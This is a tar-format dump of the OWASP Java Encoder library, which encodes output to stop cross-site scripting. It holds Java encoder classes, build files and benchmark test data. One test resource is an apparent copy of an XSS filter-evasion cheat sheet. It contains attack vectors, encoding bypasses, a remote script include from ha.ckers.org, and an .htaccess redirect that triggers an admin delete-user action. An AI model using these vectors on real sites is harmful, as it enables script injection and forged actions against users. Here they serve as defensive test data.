pax_global_header00006660000000000000000000000064137520372450014522gustar00rootroot0000000000000052 comment=1218c16431020dc0d9df2f100f5bf039b2b5d215 owasp-java-encoder-1.2.3/000077500000000000000000000000001375203724500152125ustar00rootroot00000000000000owasp-java-encoder-1.2.3/.gitignore000066400000000000000000000003441375203724500172030ustar00rootroot00000000000000*/target/** /target/** # Intellij project files *.iml *.ipr *.iws .idea/ # Eclipse project files .classpath .project .settings maven-eclipse.xml .externalToolBuilders # Netbeans configuration nb-configuration.xml */nbproject/* owasp-java-encoder-1.2.3/.travis.yml000066400000000000000000000003551375203724500173260ustar00rootroot00000000000000language: java dist: trusty jdk: - openjdk8 - oraclejdk8 # to compile using JDK 9+ we must move from source and target 1.5 to 1.6 # - openjdk9 # - openjdk10 # - openjdk11 # - oraclejdk9 # - oraclejdk10 script: mvn test -B -X owasp-java-encoder-1.2.3/LICENSE000066400000000000000000000027711375203724500162260ustar00rootroot00000000000000Copyright (c) 2015 Jeff Ichnowski All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.owasp-java-encoder-1.2.3/META-INF/000077500000000000000000000000001375203724500163525ustar00rootroot00000000000000owasp-java-encoder-1.2.3/META-INF/MANIFEST.MF000066400000000000000000000004121375203724500200010ustar00rootroot00000000000000Manifest-Version: 1.0 Bnd-LastModified: 1533328833261 Bundle-ManifestVersion: 2 Bundle-Name: org.owasp.encoder Bundle-SymbolicName: org.owasp.encoder Bundle-Version: 1.2.1 Created-By: 1.8.0_181 (Oracle Corporation) Export-Package: org.owasp.encoder Tool: Bnd-1.50.0 owasp-java-encoder-1.2.3/README.md000066400000000000000000000061671375203724500165030ustar00rootroot00000000000000OWASP Java Encoder Project ========================== [![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=master)](https://travis-ci.org/OWASP/owasp-java-encoder) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) Contextual Output Encoding is a computer programming technique necessary to stop Cross-Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. Start using the OWASP Java Encoders ----------------------------------- You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). JSP tags and EL functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). The jars are also available in Maven: ```xml org.owasp.encoder encoder 1.2.2 org.owasp.encoder encoder-jsp 1.2.2 ``` Quick Overview -------------- The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.2.jar, import org.owasp.encoder.Encode and start using. Example usage: ```java PrintWriter out = ....; out.println(""); ``` Please look at the javadoc for Encode to see the variety of contexts for which you can encode. Happy Encoding! News ---- ### 2020-11-08 - 1.2.3 Release The team is happy to announce that version 1.2.3 has been released! * Update to make the manifest OSGi-compliant (#39). * Update to support ESAPI 2.2 and later (#37). ### 2018-09-14 - 1.2.2 Release The team is happy to announce that version 1.2.2 has been released! * This is a minor release fixing documentation and licensing issues. ### 2017-02-19 - 1.2.1 Release The team is happy to announce that version 1.2.1 has been released! * The CDATA Encoder was modified so that it does not emit intermediate characters between adjacent CDATA sections. * The documentation on [gh-pages](http://owasp.github.io/owasp-java-encoder/) has been improved. ### 2015-04-12 - 1.2 Release on GitHub OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released! ### 2014-03-31 - Documentation updated Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! ### 2014-01-30 - Version 1.1.1 released We're happy to announce that version 1.1.1 has been released. Along with a important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder. ### 2013-02-14 - Version 1.1 released We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library. owasp-java-encoder-1.2.3/core/000077500000000000000000000000001375203724500161425ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/pom.xml000066400000000000000000000077431375203724500174720ustar00rootroot00000000000000 4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder jar Java Encoder The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting. org.apache.maven.plugins maven-surefire-plugin org/owasp/encoder/BenchmarkTest.java benchmark org.apache.maven.plugins maven-failsafe-plugin -Xmx1024m -XX:MaxPermSize=256m org/owasp/encoder/BenchmarkTest.java integration-test verify owasp-java-encoder-1.2.3/core/src/000077500000000000000000000000001375203724500167315ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/000077500000000000000000000000001375203724500176555ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/java/000077500000000000000000000000001375203724500205765ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/java/org/000077500000000000000000000000001375203724500213655ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/000077500000000000000000000000001375203724500225165ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/000077500000000000000000000000001375203724500241355ustar00rootroot00000000000000owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/ASCIIBits.java000066400000000000000000000101611375203724500264510ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder; /** * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs) * to be used testing lower-ASCII characters. It helps make some other code * easier to read. It is not intended to be public. */ class ASCIIBits { /** Lower 64 bits. */ long _lowerMask; /** Upper 64 bits. */ long _upperMask; /** * Sets a bit to 1 for each character in the argument string. No checking * is performed to see if characters are in the valid range 0..127. * * @param chars the characters to set to 1. * @return {@code this} */ ASCIIBits set(String chars) { for (int i=0, n=chars.length() ; i". This encoder removes invalid XML characters, and encodes * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is * maintained, but the code receiving the output will have to handle multiple * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then * use this encoder to remove any invalid XML characters. * * @author Jeff Ichnowski */ class CDATAEncoder extends Encoder { /** * The encoding of @{code "]]>"}. */ private static final char[] CDATA_END_ENCODED = "]]]]>".toCharArray(); /** * Length of {@code "]]]]>"}. */ private static final int CDATA_END_ENCODED_LENGTH = 15; /** * Length of {@code "]]>"}. */ private static final int CDATA_END_LENGTH = 3; @Override protected int maxEncodedLength(int n) { // "]" becomes "]" (1 -> 1) // "]]" becomes "]]" (2 -> 2) // "]]>" becomes "]]]]>" (3 -> 15) // "]]>]" becomes "]]]]>]" (3 -> 15 + 1 -> 1) // ... int worstCase = n / CDATA_END_LENGTH; int remainder = n % CDATA_END_LENGTH; return worstCase * CDATA_END_ENCODED_LENGTH + remainder; // return (n - remainder) * 5 + remainder; } @Override protected int firstEncodedOffset(String input, int off, int len) { final int n = off + len; //int closeCount = 0; //unused... for (int i = off; i < n; ++i) { char ch = input.charAt(i); if (ch <= Unicode.MAX_ASCII) { if (ch != ']') { if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { return i; // } else { // // valid } } else if (i + 1 < n) { if (input.charAt(i + 1) != ']') { // "]x" (next character is safe for this to be ']') } else { // "]]?" // keep looping through ']' for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { // valid } // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". if (i + 2 < n) { if (input.charAt(i + 2) == '>') { return i; // } else { // // valid } } else { return n; } } } else { return n; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { return i; // } else { // // valid } } else if (ch <= Character.MAX_HIGH_SURROGATE) { if (i + 1 < n) { if (Character.isLowSurrogate(input.charAt(i + 1))) { int cp = Character.toCodePoint(ch, input.charAt(i + 1)); if (Unicode.isNonCharacter(cp)) { return i; } else { ++i; // valid pair } } else { return i; } } else { // end of input, high without low = invalid return i; } } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE // or non-characters || ch > '\ufffd' || ('\ufdd0' <= ch && ch <= '\ufdef')) { return i; // } else { // // valid } } return n; } @Override protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { final char[] in = input.array(); final char[] out = output.array(); int i = input.arrayOffset() + input.position(); final int n = input.arrayOffset() + input.limit(); int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); for (; i < n; ++i) { char ch = in[i]; if (ch <= Unicode.MAX_ASCII) { if (ch != ']') { if (j >= m) { return overflow(input, i, output, j); } if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { out[j++] = ch; } else { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } } else if (i + 1 < n) { if (in[i + 1] != ']') { // "]x" (next character is safe for this to be ']') if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; } else { // "]]?" // keep looping through ']' for (; i + 2 < n && in[i + 2] == ']'; ++i) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; } // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". if (i + 2 < n) { if (in[i + 2] == '>') { if (j + CDATA_END_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); j += CDATA_END_ENCODED_LENGTH; i += 2; } else { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; } } else if (endOfInput) { if (j + 2 > m) { return overflow(input, i, output, j); } out[j++] = ']'; out[j++] = ']'; i = n; break; } else { break; } } } else if (endOfInput) { // seen "]", then end of input. if (j >= m) { return overflow(input, i, output, j); } out[j++] = ']'; i++; break; } else { break; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ch; } else { // C1 control code if (j >= m) { return overflow(input, i, output, j); } out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } } else if (ch <= Character.MAX_HIGH_SURROGATE) { if (i + 1 < n) { if (Character.isLowSurrogate(in[i + 1])) { int cp = Character.toCodePoint(ch, in[i + 1]); if (Unicode.isNonCharacter(cp)) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; ++i; } else { if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = ch; out[j++] = in[++i]; } } else { // high without low if (j >= m) { return overflow(input, i, output, j); } out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } } else if (endOfInput) { // end of input, high without low = invalid if (j >= m) { return overflow(input, i, output, j); } out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } else { break; } } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE // or non-characters || ch > '\ufffd' || ('\ufdd0' <= ch && ch <= '\ufdef')) { if (j >= m) { return overflow(input, i, output, j); } out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } else { if (j >= m) { return overflow(input, i, output, j); } out[j++] = ch; } } return underflow(input, i, output, j); } @Override public String toString() { return "CDATAEncoder"; } } owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/CSSEncoder.java000066400000000000000000000247041375203724500267370ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts. * Other contexts, such as color, number (w/unit), etc... are not good targets * for "encoding" (e.g. you cannot encode the string "XYZ" into a number), * they should instead by validated through other means (such as regular * expressions). */ class CSSEncoder extends Encoder { /** Number of bits in a {@code long}. */ static final int LONG_BITS = 64; /** Length of hex encoding with trailing space {@code "\## "}. */ static final int HEX_ENCODED_LENGTH = 4; /** * Encoding mode of operation--specified the set of characters that * required encoding. */ enum Mode { /** * String contexts. Characters between quotes. * * 
         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
         *   Allows: "\\{nl}" (escaped newline)
         *
*/ STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")), /** * URL context. Characters inside a "url(...)". * * 
         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
         *   Escapes: \\[0-9a-f]{1,6}(\s?)
         *            \\[^\n\r\f0-9a-f]
         *
*/ URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")), // In both contexts above '<' is added to protect embedded tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: Remote style sheet part 3 . This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: Remote style sheet part 4 . This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: Local htc file . This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: List-style-image . Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
  • XSS VBscript in an image: Mocha (older versions of Netscape only): Livescript US-ASCII encoding (found by Kurt Huwig ). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page: ¼script¾alert(¢XSS¢)¼/script¾ META (the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): META using data: directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go or to encode your own. You can also use the below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: META with additional URL parameter . If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann ): IFRAME (if iframes are allowed there are a lot of other XSS problems as well): FRAME (frames have the same sorts of XSS problems as iframes): TABLE (who would have thought tables were XSS targets... except me, of course): TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):
    DIV background-image
    DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
    DIV background-image plus extra characters . I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
    DIV expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
    STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov for this one): Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): exp/* STYLE tag (Older versions of Netscape only): STYLE tag using background-image STYLE tag using background Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added): Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo . If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one. Using ActionScript inside flash can obfuscate your XSS vector: a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); XML namespace . The htc file must be located on the same server as your XSS vector: XSS XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo: ]]> XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): <IMG SRC="javascript:alert('XSS')"> Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result HTML+TIME in XML . This is how Grey Magic hacked Hotmail and Yahoo! . This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector: SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: alert("XSS")'); ?> IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser Cookie manipulation - admittidly this is pretty obscure but I have seen a few examples where UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to for this one). Click for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.: +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- XSS using HTML quote encapsulation: This was tested in IE, your mileage may vary. For performing XSS on sites that allow " For performing XSS on sites that allow " Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: PT SRC="http://ha.ckers.org/xss.js"> URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): IP verses hostname: XSS URL encoding: XSS Dword encoding (Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details): XSS Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): XSS Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): XSS Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: XSS Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. XSS Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. XSS Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: XSS Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): XSS Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): XSS Extra dot for absolute DNS: XSS JavaScript link location: XSS Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself ( here is an example ) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): XSS Character Encoding: All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?): < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C Character Encoding Calculator ASCII Text: Enter your XSS here Hex Value: URL: HTML (with semicolons): Decimal Value: HTML (without semicolons): Base64 Value ( a more robust base64 calculator can be found here ) Base64: IP Obfuscation Calculator IP Address: : dword level Dword Address: Hex Address: Octal Address: Browser support reference table: Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2. Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000. Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option. Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional. Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional Vector works in older versions of Netscape 4.0 - untested. Note: if a vector is not marked it either does not work or it is untested. Written in vim, and UTF-8 encoded, for her pleasure. All rights reserved, all wrongs observed. © 1995-2008 owasp-java-encoder-1.2.3/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt000066400000000000000000004254511375203724500310350ustar00rootroot00000000000000"already\n started" "already\n started" "already started" "current" position "force-async" "parser-inserted" "ready to be parser-executed" <fragment> <host> <hostport> <meta name=""\n content=""> <path> <port> <query> <scheme> <script type=""> 5\n February 2004 W3C Patent Policy :active :checked :default :dir(ltr) :dir(rtl) :disabled :enabled :in-range :indeterminate :invalid :link :optional :out-of-range :read-only :read-write :required :valid :visited ERCIM MIT W3C Name application/x-www-form-urlencoded encoding\n algorithm application/x-www-form-urlencoded encoding\n algorithm data:\n URL data:\n URL data: URL form element\n pointer form element pointer head\n element pointer head element\n pointer head element pointer javascript:\n URL javascript: URL lang\n attribute in the XML namespace lang\n attributes in the XML namespace lang attribute\n in the XML namespace lang attribute in the\n XML namespace lang attribute in the XML\n namespace lang attributes in\n the XML namespace lang attributes in the\n XML namespace multipart/form-data boundary string multipart/form-data encoding\n algorithm multipart/form-data encoding\n algorithm text/plain encoding\n algorithm dropzone processing\n steps form element\n pointer form element pointer CDATASection nodes in the DOM are treated as\n equivalent to Text nodes MediaStream and\n PeerConnection events XMLHttpRequest form element\n pointer form element pointer head element hreflang\n attribute on a and area\n elements html element iframe srcdoc documents input type keyword javascript:\n URL javascript: URL in the\n Document parent browsing context W3C 1 Introduction 1.1 Background 1.10 Recommended reading 1.2 Audience 1.3 Scope 1.4 History 1.5 Design notes 1.5.1 Serializability of script execution 1.5.2 Compliance with other specifications 1.6 HTML vs XHTML 1.7 Structure of this specification 1.7.1 How to read this specification 1.7.2 Typographic conventions 1.8 A quick introduction to HTML 1.8.1 Writing secure applications with HTML 1.8.2 Common pitfalls to avoid when using the scripting APIs 1.9 Conformance requirements for authors 1.9.1 Presentational markup 1.9.2 Syntax errors 1.9.3 Restrictions on content models and on attribute values 10 Rendering 10.1 Introduction 10.2 The 